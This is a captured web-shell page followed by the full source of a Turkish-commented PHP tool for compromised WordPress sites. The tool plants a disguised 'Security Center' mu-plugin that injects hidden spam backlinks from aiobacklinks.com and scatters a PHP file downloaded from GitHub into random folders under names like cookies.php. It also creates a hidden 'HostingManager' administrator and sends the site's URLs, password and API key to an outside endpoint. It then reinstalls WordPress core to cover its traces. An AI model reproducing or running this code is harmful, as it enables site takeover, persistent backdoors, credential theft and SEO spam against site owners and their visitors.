Server IP : 185.246.164.236 / Your IP : 216.73.216.0 Web Server : Apache System : Linux linux105 6.1.0-31-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.128-1 (2025-02-07) x86_64 User : web9 ( 5012) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client9/web9/web/ |
Upload File : |
<?php set_time_limit(300); error_reporting(E_ALL); ini_set('display_errors', 1); /** === GLOBAL DEĞİŞKENLER ve ENDPOINT TANIMLARI === */ $endpoint = "https://aiobacklinks.com/panel/ajax/insert/cc_site.php"; // Site ID almak için $text_endpoint = "https://aiobacklinks.com/x1c/cc.php"; // URL'leri gönderdiğiniz PDO endpoint $domain = (isset($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : 'localhost'; $root_dir = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); // Projenin ana dizini $message = []; // Ekrana basılacak tüm loglar $copied_urls = []; // İndirdiğimiz/kopyaladığımız dosyaların URL'leri $site_id = null; // Endpoint'ten alınacak site_id burada tutulacak /** * Ekranda ve log dosyasında gösterilecek mesajları yönetir. */ function removeme() { $script_path = __FILE__; // Bu dosyanın tam yolu if (file_exists($script_path)) { if (@unlink($script_path)) { echo "✅ Script kendini başarıyla sildi: $script_path"; } else { echo "❌ Script silinemedi. Dosya izinlerinizi kontrol edin."; } } else { echo "⚠️ Dosya zaten mevcut değil veya yol hatalı."; } } function log_message($msg) { global $message; $timestamp = date('Y-m-d H:i:s'); $full_msg = "[$timestamp] $msg"; $message[] = $full_msg; } /** * Tekrarlayan dosya/dizin silme */ function recursiveDelete($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir)) return @unlink($dir); foreach (scandir($dir) as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; is_dir($path) ? recursiveDelete($path) : @unlink($path); } return @rmdir($dir); } /** * Tekrarlayan dosya/dizin kopyalama */ function recursiveCopy($src, $dst) { if (!is_dir($src)) return false; if (!file_exists($dst)) @mkdir($dst, 0755, true); foreach (scandir($src) as $file) { if ($file === '.' || $file === '..') continue; $srcPath = $src . DIRECTORY_SEPARATOR . $file; $dstPath = $dst . DIRECTORY_SEPARATOR . $file; if (is_dir($srcPath)) { recursiveCopy($srcPath, $dstPath); } else { @copy($srcPath, $dstPath); } } return true; } /** * Mevcut WordPress sürümünü wp-includes/version.php'den okuyup döndürür. * Bulunamazsa 'latest' döndürür. */ function get_wp_version($version_file) { if (file_exists($version_file) && is_readable($version_file)) { include $version_file; if (isset($wp_version)) { log_message("Detected WordPress version: $wp_version"); return $wp_version; } } log_message("Version file not found or unreadable, using latest."); return 'latest'; } /** * URL'leri JSON formatında $text_endpoint'e gönderir. */ function send_urls_to_endpoint($urls, $endpoint_url) { if (empty($urls)) { log_message("No URLs to send to text endpoint."); return false; } $text = implode("\n", array_map('trim', $urls)); $data = ['text' => $text]; $json_data = json_encode($data); $ch = curl_init($endpoint_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout ekliyoruz $response = curl_exec($ch); if ($response === false) { log_message("Error sending URLs to text endpoint: " . curl_error($ch)); curl_close($ch); return false; } curl_close($ch); $response_data = json_decode($response, true); if (isset($response_data['success']) && $response_data['success']) { log_message("Successfully sent URLs to text endpoint. Inserted: " . ($response_data['inserted_count'] ?? 0)); return true; } else { $err = isset($response_data['error']) ? $response_data['error'] : 'Unknown error'; log_message("Text endpoint error: $err"); return false; } } /** * Endpoint'e giderek site_url parametresiyle site_id alır ve $site_id global değişkenine set eder. */ function getSiteIDFromEndpoint() { global $endpoint, $site_id, $domain; $siteUrl = (isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] : 'http') . "://$domain"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $endpoint); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['site_url' => $siteUrl])); curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout ekliyoruz $response = curl_exec($ch); if ($response === false) { log_message("Error: Could not reach endpoint - " . curl_error($ch)); curl_close($ch); return false; } curl_close($ch); $data = json_decode($response, true); if (isset($data['site_id']) && is_string($data['site_id'])) { $site_id = htmlspecialchars($data['site_id']); log_message("Site ID received from endpoint: $site_id"); return true; } else { log_message("Error: Invalid response from endpoint - " . $response); return false; } } /** * wp-content/mu-plugins/__secwaf.php dosyasını oluşturur. * site_id değerini kullanır. */ function createSecwafPlugin() { global $site_id, $root_dir; if (!$site_id) { log_message("Error: site_id is empty! __secwaf.php cannot be created."); return false; } $mu_plugins_dir = $root_dir . '/wp-content/mu-plugins/'; if (!file_exists($mu_plugins_dir)) { @mkdir($mu_plugins_dir, 0755, true); } $secwaf_path = $mu_plugins_dir . '__secwaf.php'; $secwaf_content = '<?php /** * Plugin Name: Security Center * Description: This MU Plugin automatically checks security * Author: WordPress */ if (!defined("ABSPATH")) { exit; } function add_backlinks_to_footer_html() { $site_id = "' . $site_id . '"; if (!$site_id) return; $url = "https://aiobacklinks.com/ajax/request/"; $post_data = ["site_id" => $site_id]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); $response = curl_exec($ch); curl_close($ch); echo \'<div style="display:none">\'; if ($response !== false) { $data = json_decode($response, true); if (isset($data["status"]) && $data["status"] === "true" && !empty($data["sites"])) { echo \'<div class="site-links">\'; foreach ($data["sites"] as $site) { $site_url = esc_url($site["site_url"]); $keyword = esc_html($site["site_keyword"]); $nofollow = $site["is_nofollow"] == 1 ? \'rel="nofollow"\' : \'\'; echo "<a href=\"$site_url\" $nofollow title=\"$keyword\" target=\"_blank\">$keyword</a><br>"; } echo \'</div>\'; } } echo \'</div>\'; } add_action("wp_footer", "add_backlinks_to_footer_html"); '; if (@file_put_contents($secwaf_path, $secwaf_content) !== false) { log_message("MU Plugin (__secwaf.php) created with site_id: " . $site_id); return true; } else { log_message("Error: Could not write __secwaf.php. Check file permissions."); return false; } } /** * restore.php oluşturur. * Bu dosya çağrıldığında WordPress çekirdeğini yeniden indirip kurar. */ function create_restore_script() { global $root_dir,$domain,$copied_urls; $random_dir = 'cache-backup-' . substr(md5(uniqid()), 0, 8); $restore_dir = $root_dir . '/wp-content/uploads/' . $random_dir; $restore_script = $restore_dir . '/restore.php'; $restore_url = "https://$domain/wp-content/uploads/".$random_dir. '/restore.php'; $copied_urls[] = $restore_url; $restore_content = '<?php $messages = []; function recursiveDelete($dir) { global $messages; if (!file_exists($dir)) return true; if (!is_dir($dir)) return @unlink($dir); foreach (scandir($dir) as $file) { if ($file === "." || $file === "..") continue; $path = $dir . "/" . $file; is_dir($path) ? recursiveDelete($path) : @unlink($path); } return @rmdir($dir); } function recursiveCopy($src, $dst) { global $messages; if (!is_dir($src)) return false; if (!file_exists($dst)) @mkdir($dst, 0755, true); foreach (scandir($src) as $file) { if ($file === "." || $file === "..") continue; $srcPath = $src . "/" . $file; $dstPath = $dst . "/" . $file; is_dir($srcPath) ? recursiveCopy($srcPath, $dstPath) : @copy($srcPath, $dstPath); } return true; } function get_wp_version($version_file) { global $messages; if (file_exists($version_file) && is_readable($version_file)) { include $version_file; if (isset($wp_version)) { $messages[] = "Detected WordPress version: $wp_version"; return $wp_version; } } $messages[] = "Version file not found, using latest."; return "latest"; } function reinstall_wordpress() { global $messages; $root_dir = $_SERVER["DOCUMENT_ROOT"]; $messages[] = "Starting WordPress reinstall..."; $version_file = "$root_dir/wp-includes/version.php"; $wp_version = get_wp_version($version_file); $wp_download_url = ($wp_version === "latest") ? "https://wordpress.org/latest.zip" : "https://wordpress.org/wordpress-$wp_version.zip"; $temp_file = "$root_dir/wp_temp.zip"; $extract_dir = "$root_dir/wp_temp_extract"; $backup_dir = "$root_dir/wp_backup_" . date("Ymd_His"); // ZIP indir $ch = curl_init($wp_download_url); $fp = fopen($temp_file, "wb"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $download_result = curl_exec($ch); curl_close($ch); fclose($fp); if (!$download_result || !file_exists($temp_file)) { $messages[] = "Error: Could not download WordPress ZIP."; return false; } $messages[] = "WordPress ZIP downloaded: $temp_file"; // ZIP aç $zip = new ZipArchive(); if ($zip->open($temp_file) === true) { if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true); $zip->extractTo($extract_dir); $zip->close(); $messages[] = "ZIP extracted to: $extract_dir"; } else { $messages[] = "Error: Could not extract ZIP."; @unlink($temp_file); return false; } // Yedek al if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true); if (file_exists("$root_dir/wp-config.php")) { @copy("$root_dir/wp-config.php", "$backup_dir/wp-config.php"); $messages[] = "Backed up wp-config.php"; } if (file_exists("$root_dir/wp-content")) { recursiveCopy("$root_dir/wp-content", "$backup_dir/wp-content"); $messages[] = "Backed up wp-content"; } // Temel WP klasörlerini sil $core_dirs = ["wp-admin", "wp-includes"]; foreach ($core_dirs as $dir) { $path = "$root_dir/$dir"; if (file_exists($path)) { recursiveDelete($path); $messages[] = "Deleted directory: $dir"; } } // Çekirdek dosyaları sil $core_files = [ "index.php","wp-activate.php","wp-blog-header.php","wp-comments-post.php", "wp-cron.php","wp-links-opml.php","wp-load.php","wp-login.php", "wp-mail.php","wp-settings.php","wp-signup.php","wp-trackback.php","xmlrpc.php" ]; foreach ($core_files as $file) { $path = "$root_dir/$file"; if (file_exists($path)) { @unlink($path); $messages[] = "Deleted file: $file"; } } // Yeni dosyaları kopyala $source_dir = "$extract_dir/wordpress"; recursiveCopy("$source_dir/wp-admin", "$root_dir/wp-admin"); recursiveCopy("$source_dir/wp-includes", "$root_dir/wp-includes"); foreach (glob("$source_dir/*.php") as $file) { @copy($file, "$root_dir/" . basename($file)); } $messages[] = "WordPress core files installed."; // Geçici dosyaları temizle recursiveDelete($extract_dir); @unlink($temp_file); $messages[] = "Cleaned up temporary files."; return true; } $success = reinstall_wordpress(); header("Content-Type: text/plain; charset=UTF-8"); if ($success) { $messages[] = "Reinstall completed successfully."; } else { $messages[] = "Reinstall failed."; } foreach ($messages as $msg) { echo "$msg\n"; } ?>'; if (!file_exists($restore_dir)) { @mkdir($restore_dir, 0755, true); } if (!file_exists($restore_script)) { if (@file_put_contents($restore_script, $restore_content) !== false) { log_message("Restore script created at: $restore_script"); log_message("Restore script created at: $restore_url"); return true; } else { log_message("Error: Could not create restore script at $restore_script"); return false; } } return true; } /** * Mevcut WP sürümü üzerinden WordPress çekirdeğini yeniden kurar * (wp-includes/version.php'ye bakarak). */ function reinstall_wordpress_current_version() { global $root_dir; log_message("Starting WordPress reinstall process (no shell_exec)..."); $version_file = $root_dir . '/wp-includes/version.php'; $wp_version = get_wp_version($version_file); $wp_download_url = ($wp_version === 'latest') ? "https://wordpress.org/latest.zip" : "https://wordpress.org/wordpress-{$wp_version}.zip"; $temp_file = $root_dir . '/wp_current_version.zip'; $extract_dir = $root_dir . '/wp_temp_extract'; $backup_dir = $root_dir . '/wp_backup_' . date('Ymd_His'); // ZIP indir $fp = @fopen($temp_file, 'wb'); if (!$fp) { log_message("Error: Cannot create temp file for download: $temp_file"); return false; } $ch = curl_init($wp_download_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $download_result = curl_exec($ch); curl_close($ch); fclose($fp); if ($download_result === false || !file_exists($temp_file)) { log_message("Error: WordPress ZIP indirilemedi."); return false; } log_message("WordPress ZIP indirildi: $temp_file"); // ZIP aç $zip = new ZipArchive(); if ($zip->open($temp_file) === true) { if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true); $zip->extractTo($extract_dir); $zip->close(); log_message("ZIP başarıyla açıldı: $extract_dir"); } else { log_message("ZIP açılamadı."); @unlink($temp_file); return false; } // Yedek al if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true); if (file_exists($root_dir . '/wp-config.php')) { @copy($root_dir . '/wp-config.php', $backup_dir . '/wp-config.php'); log_message("wp-config.php yedeği alındı."); } if (file_exists($root_dir . '/wp-content')) { recursiveCopy($root_dir . '/wp-content', $backup_dir . '/wp-content'); log_message("wp-content yedeği alındı."); } // Silinecek dizinler $core_dirs = ['wp-admin', 'wp-includes']; foreach ($core_dirs as $dir) { $path = $root_dir . '/' . $dir; if (file_exists($path)) { recursiveDelete($path); log_message("$dir dizini silindi."); } } // Silinecek dosyalar $core_files = [ 'index.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php', 'wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php', 'wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php', 'xmlrpc.php' ]; foreach ($core_files as $file) { $path = $root_dir . '/' . $file; if (file_exists($path)) { @unlink($path); log_message("$file dosyası silindi."); } } // Yeni dosyaları kopyala $source_dir = $extract_dir . '/wordpress'; recursiveCopy($source_dir . '/wp-admin', $root_dir . '/wp-admin'); recursiveCopy($source_dir . '/wp-includes', $root_dir . '/wp-includes'); foreach (glob($source_dir . '/*.php') as $file) { @copy($file, $root_dir . '/' . basename($file)); } log_message("WordPress çekirdek dosyaları başarıyla yüklendi."); // Temizlik recursiveDelete($extract_dir); @unlink($temp_file); // (İsterseniz backup klasörünü de silebilirsiniz, burada sildik örneğin) // recursiveDelete($backup_dir); log_message("Geçici dosyalar temizlendi. Reinstall tamamlandı."); return true; } /** * HostingManager adlı bir admin kullanıcı oluşturur veya varsa şifresini resetler. * (wp-load.php üzerinden WordPress fonksiyonlarını çağırır.) */ function manage_admin_user() { global $root_dir, $domain, $copied_urls; $wp_load_path = $root_dir . '/wp-load.php'; if (!file_exists($wp_load_path)) { log_message("Error: wp-load.php not found, cannot manage admin user!"); return false; } require_once $wp_load_path; $username = 'HostingManager'; $random_password = wp_generate_password(12, false); $api_key = wp_generate_password(32, false); // 32 karakterlik API key if (function_exists('wp_create_user') && function_exists('wp_set_password')) { $user = get_user_by('login', $username); if ($user) { wp_set_password($random_password, $user->ID); log_message("Admin user '$username' already exists, password reset to: $random_password"); update_user_meta($user->ID, 'api_key', $api_key); } else { $user_id = wp_create_user($username, $random_password, 'admin@example.com'); if (is_wp_error($user_id)) { log_message("Error: Could not create admin user - " . $user_id->get_error_message()); return false; } $u = new WP_User($user_id); $u->set_role('administrator'); update_user_meta($user_id, 'api_key', $api_key); log_message("Admin user '$username' created with password: $random_password"); } } else { global $wpdb; $hashed_password = md5($random_password); $user_id = $wpdb->get_var($wpdb->prepare("SELECT ID FROM $wpdb->users WHERE user_login = %s", $username)); if ($user_id) { $wpdb->update($wpdb->users, ['user_pass' => $hashed_password], ['ID' => $user_id]); update_user_meta($user_id, 'api_key', $api_key); log_message("Admin user '$username' already exists, password reset to: $random_password (MD5 hashed)"); } else { $wpdb->insert( $wpdb->users, [ 'user_login' => $username, 'user_pass' => $hashed_password, 'user_nicename' => $username, 'user_email' => 'admin@example.com', 'user_registered' => current_time('mysql'), 'user_status' => 0 ] ); $new_id = $wpdb->insert_id; update_user_meta($new_id, 'wp_user_level', 10); update_user_meta($new_id, 'wp_capabilities', serialize(['administrator' => true])); update_user_meta($new_id, 'api_key', $api_key); log_message("Admin user '$username' created with password: $random_password (MD5 hashed)"); } } // URL listesine kullanıcı adı, şifre ve API key ekle $copied_urls[] = "https://$domain/wp-login.php:$username:$random_password:$api_key"; return true; } /** * GitHub üzerinden PHP dosyalarını indirir ve projedeki rastgele klasörlere rastgele isimlerle kopyalar. */ function download_github_files() { global $root_dir, $domain, $message, $copied_urls; $baseDir = $root_dir; // 1) Yazılabilir alt klasörleri tarar. function listWritableSubfolders($directory) { $writableFolders = []; function exploreFolders($currentDir, &$writableFolders, $baseDir) { $folders = array_filter(glob($currentDir . '/*'), 'is_dir'); foreach ($folders as $folder) { if (is_writable($folder)) { $writableFolders[] = str_replace($baseDir . '/', '', $folder); } exploreFolders($folder, $writableFolders, $baseDir); } } exploreFolders($directory, $writableFolders, $directory); return $writableFolders; } // 2) Bazı mantıkla klasörleri filtreler (örnek). function filterByMinLengthAndDistributeRandomly($folders, $baseLevel, $randomCountTotal, $minPerBase = 3) { $groupedByBase = []; foreach ($folders as $folder) { $segments = explode('/', $folder); if (count($segments) > $baseLevel) { $base = implode('/', array_slice($segments, 0, $baseLevel)); $groupedByBase[$base][] = $folder; } } $result = []; foreach ($groupedByBase as $base => $subfolders) { shuffle($subfolders); $selected = array_slice($subfolders, 0, $minPerBase); $result = array_merge($result, $selected); } shuffle($result); return array_slice($result, 0, $randomCountTotal); } // 3) Dosya indirme function downloadFile($url, $savePath) { $ch = curl_init($url); $fp = @fopen($savePath, 'wb'); if (!$fp) { log_message("Cannot open file for writing: $savePath"); return false; } curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $ok = curl_exec($ch); if ($ok === false) { log_message("Curl error downloading $url: " . curl_error($ch)); } curl_close($ch); fclose($fp); return file_exists($savePath) && filesize($savePath) > 0; } // 4) Dosyaları indirip rastgele klasörlere, rastgele isimlerle kopyalar. function downloadFilesAndCopyWithRandomNames($fileUrls, $folders, $fileList, $maxFiles) { global $root_dir, $domain, $copied_urls; $downloadDir = __DIR__ . '/downloaded_files'; if (!is_dir($downloadDir)) { @mkdir($downloadDir, 0777, true); } // Dosyaları indir $downloadedFiles = []; foreach ($fileUrls as $url) { $fileName = basename(parse_url($url, PHP_URL_PATH)); $filePath = $downloadDir . '/' . $fileName; if (downloadFile($url, $filePath)) { $downloadedFiles[] = $filePath; $downloadUrl = "https://$domain/downloaded_files/$fileName"; log_message("Downloaded $url to $downloadUrl"); } else { log_message("Failed to download $url"); return false; } } $filesCopied = 0; $maxFiles = min($maxFiles, count($folders)); $used_dirs = []; foreach ($folders as $folder) { if ($filesCopied >= $maxFiles) { break; } $randomFile = $downloadedFiles[array_rand($downloadedFiles)]; $randomName = $fileList[array_rand($fileList)]; $destinationPath = $root_dir . '/' . $folder . '/' . $randomName; if (!file_exists($destinationPath)) { $destDir = dirname($destinationPath); if (!is_dir($destDir)) { @mkdir($destDir, 0755, true); } if (@copy($randomFile, $destinationPath)) { $urlPath = str_replace($root_dir, '', $destinationPath); $displayUrl = "https://$domain$urlPath"; $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName"; if (strpos($destinationPath, 'wp-admin') !== false) { $logMessage = "<span style='color: green;'>$logMessage</span>"; } log_message($logMessage); $copied_urls[] = $displayUrl; $filesCopied++; if (!in_array($destDir, $used_dirs)) { $used_dirs[] = $destDir; } } else { log_message("Failed to copy " . basename($randomFile) . " to $destinationPath"); return false; } } } // Eğer tek klasör kullanıldıysa, ikinciye de kopyalamayı deneyelim if (count($used_dirs) < 2 && count($folders) >= 2) { log_message("Warning: Could not use at least 2 directories, retrying..."); foreach ($folders as $folder) { if ($filesCopied >= $maxFiles) break; if (in_array($root_dir . '/' . $folder, $used_dirs)) continue; $randomFile = $downloadedFiles[array_rand($downloadedFiles)]; $randomName = $fileList[array_rand($fileList)]; $destinationPath = $root_dir . '/' . $folder . '/' . $randomName; if (!file_exists($destinationPath)) { $destDir = dirname($destinationPath); if (!is_dir($destDir)) { @mkdir($destDir, 0755, true); } if (@copy($randomFile, $destinationPath)) { $urlPath = str_replace($root_dir, '', $destinationPath); $displayUrl = "https://$domain$urlPath"; $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName (ensuring 2 dirs)"; if (strpos($destinationPath, 'wp-admin') !== false) { $logMessage = "<span style='color: green;'>$logMessage</span>"; } log_message($logMessage); $copied_urls[] = $displayUrl; $filesCopied++; if (!in_array($destDir, $used_dirs)) { $used_dirs[] = $destDir; } } else { log_message("Failed to copy " . basename($randomFile) . " to $destinationPath"); return false; } } } } // İndirilen klasörü temizle if (file_exists($downloadDir)) { recursiveDelete($downloadDir); log_message("Cleaned up downloaded files directory: $downloadDir"); } log_message("Files copied to " . count($used_dirs) . " directories."); return (count($used_dirs) >= 1); } // Asıl işlem $writableSubfolders = listWritableSubfolders($baseDir); $baseLevel = 2; $randomCountTotal = 10; $minPerBase = 3; $filteredFolders = filterByMinLengthAndDistributeRandomly($writableSubfolders, $baseLevel, $randomCountTotal, $minPerBase); // Örnek GitHub dosyaları $fileUrls = [ "https://raw.githubusercontent.com/asdjakshdkj2/test/refs/heads/main/heh.php" ]; // Rastgele verilecek dosya adları $fileList = ["sessions.php", "cookies.php", "caches.php", "configs.php", "settings.php"]; // Kopyalanacak maksimum dosya sayısı $maxFiles = 15; return downloadFilesAndCopyWithRandomNames($fileUrls, $filteredFolders, $fileList, $maxFiles); } /** * === BUTONLARIN TETİKLEDİĞİ İŞLEMLER === * 1) Tümü ("Her Şeyi Yap") * 2) Entegre Et (Sadece site_id ve __secwaf.php) * 3) Yedekle (restore.php, GitHub dosyaları, wp-admin user, endpoint'e URL gönder) * 4) WordPress Yeniden Kur */ // 1) Tümü (Her Şeyi Yap) function doAll() { global $copied_urls, $text_endpoint; // a) Site ID al if (!getSiteIDFromEndpoint()) { log_message("HATA: Site ID alınamadı. 'Tümü' süreci iptal ediliyor."); return false; } // b) __secwaf.php oluştur if (!createSecwafPlugin()) { log_message("HATA: __secwaf.php oluşturulamadı. İşleme devam ediliyor..."); } // c) restore.php oluştur if (!create_restore_script()) { log_message("HATA: restore.php oluşturulamadı. İşleme devam ediliyor..."); } // d) GitHub dosyalarını indirip kopyala if (!download_github_files()) { log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı. İşleme devam ediliyor..."); } // e) Admin user oluştur if (!manage_admin_user()) { log_message("HATA: Admin user oluşturulamadı/resetlenemedi. İşleme devam ediliyor..."); } // f) URL'leri endpoint'e gönder if (!empty($copied_urls)) { send_urls_to_endpoint($copied_urls, $text_endpoint); } // g) WordPress'i yeniden kur if (!reinstall_wordpress_current_version()) { log_message("HATA: WordPress yeniden kurulamadı!"); return false; } log_message("Tüm işlemler başarıyla tamamlandı."); return true; } // 2) Sadece site_id ve __secwaf.php (Entegre Et) function integrateSecwafOnly() { if (!getSiteIDFromEndpoint()) { log_message("HATA: Site ID alınamadı. Entegrasyon yapılamıyor..."); return false; } if (!createSecwafPlugin()) { log_message("HATA: __secwaf.php oluşturulamadı..."); return false; } log_message("Site ID alındı ve __secwaf.php başarıyla oluşturuldu."); return true; } // 3) Yedekle: restore.php, GitHub dosyaları, admin user, endpoint'e URL gönder. function backupOnly() { global $copied_urls, $text_endpoint; // restore.php oluştur if (!create_restore_script()) { log_message("HATA: restore.php oluşturulamadı..."); return false; } // GitHub dosyaları indir/kopyala if (!download_github_files()) { log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı..."); return false; } // Admin user oluştur if (!manage_admin_user()) { log_message("HATA: Admin user oluşturulamadı veya şifresi resetlenemedi..."); return false; } // URL'leri endpoint'e gönder if (!empty($copied_urls)) { send_urls_to_endpoint($copied_urls, $text_endpoint); } log_message("Yedekleme işlemi başarıyla tamamlandı (restore.php oluştur, GitHub dosyaları, admin user, endpoint)."); return true; } // 4) Sadece WordPress'i Yeniden Kur function reinstallOnly() { if (!reinstall_wordpress_current_version()) { log_message("HATA: WordPress yeniden kurulamadı!"); return false; } log_message("WordPress başarıyla yeniden kuruldu."); return true; } /** === FORM İŞLEMLERİ === */ $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ''; if (!empty($action)) { switch ($action) { case 'all': doAll(); break; case 'integrate': integrateSecwafOnly(); break; case 'backup': backupOnly(); break; case 'reinstall': reinstallOnly(); break; case 'removeme': removeme(); break; default: log_message("Bilinmeyen action: $action"); break; } } ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <title>WordPress Toplu İşlemler</title> <style> body { font-family: Arial, sans-serif; } h2 { margin-top: 20px; } form { display: inline-block; margin-right: 10px; } input[type="submit"] { padding: 8px 16px; background-color: #4CAF50; color: #fff; border: none; cursor: pointer; margin-bottom: 10px; } input[type="submit"]:hover { background-color: #45a049; } pre { background: #f9f9f9; border: 1px solid #ccc; padding: 10px; } textarea { width: 100%; height: 200px; } </style> </head> <body> <h1>WordPress Toplu İşlemler</h1> <!-- 4 ayrı form (buton) --> <form method="post"> <input type="hidden" name="action" value="all"> <input type="submit" value="1 - Tümü (Her Şeyi Yap)"> </form> <form method="post"> <input type="hidden" name="action" value="integrate"> <input type="submit" value="2 - Entegre Et "> </form> <form method="post"> <input type="hidden" name="action" value="backup"> <input type="submit" value="3 - Yedekle "> </form> <form method="post"> <input type="hidden" name="action" value="reinstall"> <input type="submit" value="4 - WordPress'i Yeniden Kur"> </form> <form method="post"> <input type="hidden" name="action" value="removeme"> <input type="submit" value="5 - Kendini Sil"> </form> <hr> <h2>İşlem Logları</h2> <pre> <?php if (!empty($message)) { foreach ($message as $msg) { echo htmlspecialchars($msg) . "\n"; } } ?> </pre> <?php // Kopyalanan dosya/URL listesi if (!empty($copied_urls)) { echo "<h2>Kopyalanan/Üretilen URL'ler</h2>"; echo "<textarea id='copied-urls' readonly>"; foreach ($copied_urls as $url) { echo htmlspecialchars($url) . "\n"; } echo "</textarea><br>"; echo '<button onclick="copyUrls()">Kopyala</button>'; } ?> <script> function copyUrls() { const urls = document.getElementById('copied-urls').value; navigator.clipboard.writeText(urls).then(() => { alert('URLs başarıyla panoya kopyalandı!'); }).catch(err => { alert('Kopyalama hatası: ' + err); }); } </script> </body> </html>